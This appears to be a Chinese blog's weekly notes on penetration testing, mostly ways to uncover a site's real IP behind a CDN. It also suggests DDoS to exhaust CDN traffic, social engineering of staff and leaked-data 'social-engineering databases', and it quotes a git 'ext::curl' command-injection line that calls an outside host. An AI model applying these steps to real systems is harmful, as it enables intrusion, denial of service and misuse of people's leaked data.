Jirairya

周结0


每日一看,一周总结

技巧

CDN

CDN是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。CDN的基本原理是广泛采用各种缓存服务器,将这些缓存服务器分布到用户访问相对集中的地区或网络中,在用户访问网站时,利用全局负载技术将用户的访问指向距离最近的工作正常的缓存服务器上,由缓存服务器直接响应用户请求。

  • 查看域名的历史解析记录
  • 注册的地方,看邮件头,扫C段
  • 寻找主站的真实IP,搜集其他公司的所有IP,写脚本,绑定host,直接解析
  • 验证是否存在CDN 通过在线的多地ping,通过各地区ping的结果得到ip,比较ip
  • 验证ip和域名是否真实对应 修改本地hosts文件,强行将域名与ip解析对应,然后访问域名,查看页面是否变化
  • ping顶级域名。厂商可能让www使用cdn,空域名不使用CDN缓存
  • ping分站域名。为了省钱,分站未作CDN。对比IP
  • 通过国外代理访问,或者通过国外的DNS解析。许多国内CDN只针对国内用户加速。
  • mx记录查询,一般会是c段。一些网提供注册服务,可能会验证邮件,还有RSS订阅邮件、忘记密码等等可能服务器本身自带sendmail可以直接发送邮件,当然使用第三方的除外(如网易、腾讯的等) 通过邮件发送地址往往也能得到服务器IP。当然这个IP也要验证是否为主站的。Web版的邮件管理,可以通过常看网页源代码看到IP
  • 信息查询
  • xss,让服务器主动连接攻击者
  • 找彩蛋phpinfo();之类的探针
  • DDOS,耗尽CDN流量,回源之后找到真实ip。不设防的cdn量大就会挂,高防CDN要增大流量
  • 社工。勾搭CDN妹子
  • 查看域名绑定历史,(17ce)[http://www.17ce.com/] (netcraft)[http://toolbar.netcraft.com/site_report?url=]
  • DNS社工裤
  • cloudflare (freebuff)[http://www.freebuf.com/articles/web/41533.html]
  • 全网扫描,zmap

绕过waf

git执行任意命令

$ git clone "ext::curl orange.tw..."
可執行任意指令

编程

环境

社工

京东数据 信华数据

案例

获取麦当劳用户密码-沙箱逃逸


Comments

Content